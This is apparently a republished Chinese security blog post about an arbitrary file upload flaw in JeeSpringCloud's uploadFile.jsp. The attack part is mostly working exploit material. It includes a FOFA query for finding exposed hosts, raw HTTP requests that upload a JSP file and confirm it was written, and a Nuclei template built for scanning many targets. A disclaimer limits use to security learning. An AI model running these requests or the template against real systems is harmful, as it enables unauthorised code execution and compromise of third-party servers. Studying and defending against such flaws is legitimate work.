JeeSpringCloud uploadFile.jsp存在任意文件上传

admin

102702
文章

87
评论

2023年11月14日11:20:40评论257 views字数 2983阅读9分56秒阅读模式

漏洞描述

BEGINNINGO WINTER

JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台，JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件。

漏洞复现

BEGINNING OF WINTER

步骤一：在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....

#FOFA搜索语法header="com.jeespring.session.id"

步骤二：开启代理并打开BP对其首页进行抓包拦截....修改请求包内容....在响应数据包的正文中返回文件名称。

POST /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/ HTTP/1.1Host: ipCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: yourCookieConnection: closeContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryxzUhGld6cusN3AlkContent-Length: 227
------WebKitFormBoundaryxzUhGld6cusN3AlkContent-Disposition: form-data; name="fileshare"; filename="123.jsp"Content-Type: image/jpeg
 <% out.println("hello jeespringcloud"); %>------WebKitFormBoundaryxzUhGld6cusN3Alk--

JeeSpringCloud uploadFile.jsp存在任意文件上传

步骤三：访问/static/uploadify/filename，即可回显写入的文件内容。

GET /static/uploadify/2023110707321247231.jsp HTTP/1.1Host: IPUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cookie: com.jeespring.session.id=927de707ee494db4b47d97f8a1a7bca2Connection: close

JeeSpringCloud uploadFile.jsp存在任意文件上传

批量脚本

BEGINNING OF WINTER

id: jeespringcloud-cms-uploadfile-fileupload
info:  name: jeespringcloud-cms-uploadfile-fileupload  author: yy  severity: high  description: JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台，JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件。  tags: jeespringcloud,fileupload  metadata:    fofa-qeury: header="com.jeespring.session.id"    veified: true    max-request: 2
http:  - raw:      - |                      POST /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/ HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk        Content-Length: 211
        ------WebKitFormBoundaryxzUhGld6cusN3Alk        Content-Disposition: form-data; name="fileshare"; filename="123.jsp"        Content-Type: image/jpeg
        <% out.println("hello jeespringcloud"); %>        ------WebKitFormBoundaryxzUhGld6cusN3Alk--      - |                      GET /static/uploadify/{{filename}} HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15       
    extractors:      - type: regex        name: filename        part: body        internal: true        regex:          - "[0-9]{19}.jsp"                   matchers:           - type: dsl        name: filename        dsl:          - "status_code_1 == 200 &&contains(body,'hello jeespringcloud') && contains(header,'text/html')"

揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！！！！！

扫码获取更多精彩

原文始发于微信公众号（揽月安全团队）：JeeSpringCloud uploadFile.jsp存在任意文件上传

左青龙
微信扫一扫

右白虎
微信扫一扫

JeeSpringCloud uploadFile.jsp存在任意文件上传

【開山安全笔记】WAF略知一二

R语言中的新漏洞可导致项目易受供应链攻击

从未授权使用破解软件到VenomRAT木马的应急响应

【红蓝/演练】-事前准备(6)之互联网风险收敛

如何利用关键 Ray 框架漏洞来入侵全球 AI 机器？

高级黑客技术- 6. 后门

【红蓝/演练】-事前准备(6)之办公网风险收敛

【红队】lnk钓鱼的奇思妙想(你应该没见过)

加密请求的口令爆破

实战中一些快速审计挖洞技巧

发表评论

在线咨询

微信